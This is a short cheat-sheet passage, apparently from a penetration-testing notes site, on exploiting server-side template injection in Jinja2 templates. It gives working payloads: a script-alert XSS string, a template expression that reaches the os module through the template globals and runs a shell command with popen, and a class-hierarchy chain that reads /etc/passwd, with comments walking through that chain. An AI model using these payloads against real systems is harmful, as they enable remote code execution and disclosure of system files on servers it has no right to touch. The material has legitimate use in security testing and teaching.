Exploitation
Exploiting the SSTI
Cross Site Scripting
{{ "<script>alert('XSS')</script>" }}{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('echo \"<script>alert(1)</script>\"').read() }}Remote Code Execution
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}'' # creates the empty string variable.__class__ # returns the class that the string belongs in (<class 'str'>).__mro__ # listing the classes.__mro__[2]
# accessing the classes that are on the top of hierarchy to find as many
# useful classes as we can
# in our case it is <class 'object'>Last updated